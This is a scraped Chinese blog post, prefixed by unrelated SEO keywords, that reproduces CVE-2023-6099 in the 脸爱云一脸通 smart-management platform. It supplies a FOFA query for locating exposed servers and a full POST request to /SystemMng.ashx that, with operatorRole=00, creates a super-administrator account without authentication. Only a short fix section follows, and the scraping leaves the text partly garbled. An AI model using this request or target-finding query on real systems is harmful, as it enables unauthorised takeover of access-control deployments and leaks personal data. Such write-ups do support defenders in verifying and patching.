南京行业门户网站,两个相同的网站对做优化有帮助,免费背景图片素材网,百度网盘怎么用文章目录 优卡特脸爱云一脸通智慧管理平台未授权SystemMng.ashx接口漏洞复现#xff08;CVE-2023-6099#xff09; [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议 优卡特脸爱云一脸通智慧管理平台未授权… 文章目录 优卡特脸爱云一脸通智慧管理平台未授权SystemMng.ashx接口漏洞复现CVE-2023-6099 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议 优卡特脸爱云一脸通智慧管理平台未授权SystemMng.ashx接口漏洞复现CVE-2023-6099 [附POC]
0x01 前言
免责声明请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用
0x02 漏洞描述
脸爱云一脸通智慧管理平台是一套功能强大运行稳定操作简单方便用户界面美观轻松统计数据的一脸通系统。无需安装只需在后台配置即可在浏览器登录。
脸爱云一脸通智慧管理平台/SystemMng.ashx接口处存在未授权漏洞通过输入00操纵参数operatorRole导致特权管理不当未经身份认证的攻击者可以通过此漏洞创建超级管理员账户造成信息泄露和后台接管。
0x03 影响版本 version 1.0.55.0.0.10x04 漏洞环境
FOFA语法 title“欢迎使用脸爱云 一脸通智慧管理平台”
0x05 漏洞复现
1.访问漏洞环境 2.构造POC
POC POST
POST /SystemMng.ashx HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charsetUTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9
Connection: closeoperatorName用户名operatorPwd密码operpassword密码operatorRole00visible_jh%E8%AF%B7%E9%80%89%E6%8B%A9visible_dorm%E8%AF%B7%E9%80%89%E6%8B%A9funcNameaddOperators3.复现
1.发送创建用户数据包 创建超级管理员sysadmin成功
2.登录后台验证
0x06 修复建议 1. 关闭互联网暴露面接口设置访问权限2. 升级至安全版本
